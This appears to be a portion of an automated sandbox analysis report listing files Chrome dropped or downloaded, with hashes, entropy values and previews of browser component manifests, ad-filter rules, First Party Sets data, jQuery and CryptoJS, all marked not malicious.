                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJjcl9lbi11c181MDAwMDBfaW5kZXguYmluIiwicm9vdF9oYXNoIjoiT2lRLV9wWnNraVM4VkRmaEpfUWtMREoxUFBIOUg1ZXhPbXBHcXAyanc3USJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJ5emtmVW9qcmFST0NXLThFZW9zb2RHUlJmSTlqYWpCaDRtS3hGbXlMbndRIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoib2JlZGJiaGJwbW9qbmthbmljaW9nZ25tZWxtb29tb2MiLCJpdGVtX3ZlcnNpb24iOiIyMDI0MTEwNC42OTA4MTAwNjIuMTQiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"jzb_MosCm_2qMIcsJ93mxQ6Aed67dxVLzMv6_pKvpvm-0gkF6e8F5GBvH-qPHhsb6TtKEMr7q-5N1at_kYqQufH3QujtcC_hgTMQu4klFTaHN-h26puephTfcfcU94I19ru3soM2JTDuW0mkkCd2NHcgezAl0BVpxh-689PZng8VPzaA_P1oVcflQhmc7sTl1Tj80VFX_wunmf0wZTn5iGiILiXhrHH7pi2unlzXx9_LkBLBwShsk9kqN_HJG8NhGIXhQ9yiG8e5A4sp3OG-M-pJkx7o_5FiOwGUXWE3F71DowReAAdWkhg0p9W
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7959899
                                                                                      Entropy (8bit):6.566332586225231
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:kAEt2h9aexbjMgzGkvfwyHqAwzikSMkDDYh7:kR2h9deCGiwyKrBSj3YJ
                                                                                      MD5:1C7A4634CEF06AAA33C5F314F59B200F
                                                                                      SHA1:536D968F23C42B5F892A4957303586B3965B2347
                                                                                      SHA-256:826B6D494FBAAEDD9D52D45429D3B3B9F5F0EF068962F71F28C34CF94D47C146
                                                                                      SHA-512:8B7698D945942167D1B562C95F77E462660AFA8018EB557C332E16BE6070CC97DCB12C7625C610921D511FE0CB9CAB40FE220EEC20FECD6D7C88599B588BCFAD
                                                                                      Malicious:false
                                                                                      Preview:......w.....aQ....hi1!..y%)2..f?x3..t.,<..r..J..ge.S..n..Z..c..a..e..v..s. }..dEy...l.:...b.....mI....p_....i.....u.....o.....z)r...v.O...k.....xG*...jQ....4.;...1....q.....5.U...29....9.|...3.....7."...6.^...8]....0......;....*I..............w................&%.....M....... ......_..........$............g..../............... ............&.......... meaning^ ..-3..... to usd2.....Y...... meaning$.... .... ........................)-...... meaning............... meaning.>...S....@.....(9...... meaning.................... meaningh....u....#......eviri.x.... meaning.%..... ............ meaningl..... meaning....... ..... ........r eldonN..... meaning.d. . .... ...........Z.... meaning.8............ ... .....H..... meaning........ 14......... ......@....T....sad.ra bjarkard.ttir barney............... meaning8................
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):66
                                                                                      Entropy (8bit):3.926748386133333
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:SFVnMfnEH/GXCpU4YtGGn:SFFMfGRgn
                                                                                      MD5:5A9C7C68D410514A75DEF6B69386836F
                                                                                      SHA1:3C8F19A198191257C47E79FAEC862141AF2CFC4A
                                                                                      SHA-256:187D465315C5E127B19A43D1A4B45B6F61A53638E140205AC366DC3791A70522
                                                                                      SHA-512:BC5A97BCDAF6CB6ABFF8BC4C103F87E4F5AC41493F5D74DA670E74412276CEAED708C9678A00D5A3C6F4E499389076591128A3EC4AE16267E779B4ECC8545AE0
                                                                                      Malicious:false
                                                                                      Preview:1.fe864c0d463d98b3666ceb3ffefdd9a3b9ab92fcc2230ffd1a42427795ca5c3d
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):108
                                                                                      Entropy (8bit):4.832692341109591
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:rR6TAulhFphifF0AAGAR3CKG/w/VpKS11L4UvIgn:F6VlMT2C7Y/VUS11LBvIgn
                                                                                      MD5:A21BEEF1F9D84A0738ED51B24D24A76C
                                                                                      SHA1:B3FC285290405A96CDF1CFF5BBC8372C878E0F4B
                                                                                      SHA-256:CB391F5288EB6913825BEF047A8B287464517C8F636A3061E262B1166C8B9F04
                                                                                      SHA-512:79511B5001D83BC4833C94B5CEC5C04AD3A24B4095F35E4DB5098EC30DCBA51E813C9370C83F63556F28AD062365D0405C93891E782FFB5174C25952BEF41928
                                                                                      Malicious:false
                                                                                      Preview:{. "manifest_version": 2,. "name": "OnDeviceHeadSuggestENUS500000",. "version": "20241104.690810062.14".}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):74598
                                                                                      Entropy (8bit):5.5368864380577545
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:7geXUzNNSGg1dSkNp+z55w4kgNmmO6I7kWvQFlGlHUvkS6xt/GL95vkdwz:sDRNfgr9NpK5wl+1O6IoWQFlGlHLS6xQ
                                                                                      MD5:C6AF15DA82A8A9172FC9CAFC969DE4F9
                                                                                      SHA1:81F477E181036D551EF6F09CB875C6B280BEBE00
                                                                                      SHA-256:782009D9765C6104A1B4D1EAC553834E7E399D749A082EAD42BB47ABB42895B5
                                                                                      SHA-512:F541CB1703A0BD31FCB6E293ACBC6E20F73B365FF8D2270A6D44780E9D5731B8D7803AECACD49D73E0DA065DD1026C9FA95F9CAD2BF0776CE1E2C3C9FCA052C6
                                                                                      Malicious:false
                                                                                      Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.just-news.pro^..........0.8.@.R.yomeno.xyz^..........0.8.@.R.yellowblue.io^..........0.8.@.R.thubanoa.com^..........0.8.@.R.abh.jp^..........0.8.@.R.ad999.biz^..........0.8.@.R._468_60...........0.8.@.R.adrecover.com^..........0.8.@.R.pemsrv.com^..........0.8.@.R.mnaspm.com^..........0.8.@.R..ar/ads/.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_.>........*...worldstar.com0.8.@.R.js.assemblyexchange.com/wana..(........0.8.@.R.ogads-pa.googleapis.com^..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^.(........0.8.@.R.shikoku-np.co.jp/img/ad/..........0.8.@.R./banner.cgi?..........0.8.@.R./in/track?data=.!......0.8.@.R.linkbucks.com/tmpl/..........0.8.@.R.clicktripz.com^..........0.8.@.R.-ad-manager/........0.8.@.R.files.slack.com^.$........0.8.@.R.admitad-connect.com^..........0.8.@.R./300-250-.2........0.8.@.R"cloud
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):24623
                                                                                      Entropy (8bit):4.588307081140814
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                      MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                      SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                      SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                      SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                      Malicious:false
                                                                                      Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1529
                                                                                      Entropy (8bit):5.97509175092227
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:pZRj/flTHY4NukYbKcFjeT3U8zkaoX+UqiF46u9ILn9oXUMzniumZ39TzIS/Xre:p/h44SbKcETEwkakBa6F9kUpumZR/Xi
                                                                                      MD5:951BA6192A41622EC0E04174E1EFA31C
                                                                                      SHA1:2C63243A5589671BF649FA049542308D3D7EB40E
                                                                                      SHA-256:EA426C8FDAFABF1B3162C206175A17100613C85A0C30DDCDC0A3434232B69D59
                                                                                      SHA-512:F9C612AA2848C01C2A3294378E6707AE92638FC5EF4C6C911D400AA981418AEF0334DBFAB1D954E0666ECDD5AB8B1506354D9C6DCF6D3D1459FAC2AD06F9E23E
                                                                                      Malicious:false
                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJ1VkRrWHp2UWlFeHdiRGtPWHNQdWtuXzI3ZGdIbGhPdDRQeENEZ0JnUXhRIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IlhiOTU4SjJabnFtQzJRMzBYclJFNl9acURIQU9VZFRKaFdyNzV6SnVuV2sifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuNTIuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"534ZoaSA4vZpcy0b1OYq4wgLlduJCzBpUCZnNXyx3UoH1ihy6uYapK85BVjJa1ptpN9OiT86GN1r8DNZlX69tLTIyTb7lSKoX31Sef3uvZpSLJBlIGI1173pGoj52Eu77I4DraCiKTVQ4mtVLBee579FqGijozIApfrepXVZeIes4wac06yB06DuFkdEg_jnCv3xR2twcNzidsDVTw7W-VOezjdZgjousBDON_Pumwd7_4ze5
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):66
                                                                                      Entropy (8bit):3.8945408555413215
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:SjWMQ0GiUVfkCzNMEkDRApvTD:SjWR/3tkNApvTD
                                                                                      MD5:87190EF44A670A5418E7E6B26DA5CF02
                                                                                      SHA1:7F24A0F6E188CA285526C968359D5DEEB0CA3F1C
                                                                                      SHA-256:B9C7B754CFFECA3981CA26BCFEC1FA9988070C8657AE9DA3CA2EA7944E16AB00
                                                                                      SHA-512:2980EBB51CCEE91B7F887A49D495BA9E3F4D0274AA6D4D0A3E8E4D3E3661815FB825C6D44DAFA34285E3625F979084FFAD5D54E8AE0B9E12ABFEF5C2F71E568C
                                                                                      Malicious:false
                                                                                      Preview:1.b48b30af5ce18c96128bfff9d2755c7932a1f32adc66f68322f7dd505db9626f
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):114
                                                                                      Entropy (8bit):4.547350270682037
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1HVgn:F6VlMZWuMt5SKPS16n
                                                                                      MD5:3EE731D0E5BFB74CACB3D9E2DFDC7768
                                                                                      SHA1:EE15CB60213BB402FD90308F0F67D7B6160C9751
                                                                                      SHA-256:5DBF79F09D999EA982D90DF45EB444EBF66A0C700E51D4C9856AFBE7326E9D69
                                                                                      SHA-512:F38E3FEDD392F9B273565CBE321A56051EDAF48DB75A0EBB539D57E8D1238D4BAC41E973F037395F9C5D4A189DF5E68726ED2C000134FC36BB7E7295C9A779C1
                                                                                      Malicious:false
                                                                                      Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.52.0".}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1558
                                                                                      Entropy (8bit):5.11458514637545
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                      MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                      SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                      SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                      SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                      Malicious:false
                                                                                      Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1864
                                                                                      Entropy (8bit):6.018989605004616
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                      MD5:C4709C1D483C9233A3A66A7E157624EA
                                                                                      SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
                                                                                      SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
                                                                                      SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
                                                                                      Malicious:false
                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):66
                                                                                      Entropy (8bit):3.820000180714897
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
                                                                                      MD5:BBEC7670A2519FEB0627F17D0C0B5276
                                                                                      SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
                                                                                      SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
                                                                                      SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
                                                                                      Malicious:false
                                                                                      Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):85
                                                                                      Entropy (8bit):4.462192586591686
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
                                                                                      MD5:084E339C0C9FE898102815EAC9A7CDEA
                                                                                      SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
                                                                                      SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
                                                                                      SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
                                                                                      Malicious:false
                                                                                      Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):9817
                                                                                      Entropy (8bit):4.629347296880043
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
                                                                                      MD5:8C702C686B703020BC0290BAFC90D7A0
                                                                                      SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
                                                                                      SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
                                                                                      SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
                                                                                      Malicious:false
                                                                                      Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):48316
                                                                                      Entropy (8bit):5.6346993394709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                      Malicious:false
                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47671)
                                                                                      Category:dropped
                                                                                      Size (bytes):47672
                                                                                      Entropy (8bit):5.401921124762015
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                      MD5:B804BCD42117B1BBE45326212AF85105
                                                                                      SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                      SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                      SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                      Malicious:false
                                                                                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                      Category:dropped
                                                                                      Size (bytes):89501
                                                                                      Entropy (8bit):5.289893677458563
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                      Malicious:false
                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 10 x 57, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):4.022997040570905
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPlHGtlpIsoyxl/k4E08up:6v/lhP8tlms17Tp
                                                                                      MD5:565B6CD722C5E2369514359B6FAABEF0
                                                                                      SHA1:33E8CC51E0C98E1154D4C01EB8D2966118291EA3
                                                                                      SHA-256:1A33D7A79FB2557DEC68C407013EBB934EDDAB88EB17C73F5B3CA367462D2A42
                                                                                      SHA-512:80731451986EDB3CE539010E4A78F72EB947967D6684A38C4C235EBC171069BA91DBC705F5B130B45E83DBBE5238BA5454DE7FD4932A3490A41AB18547C098E1
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR.......9.......-.....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):48316
                                                                                      Entropy (8bit):5.6346993394709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                      Malicious:false
                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
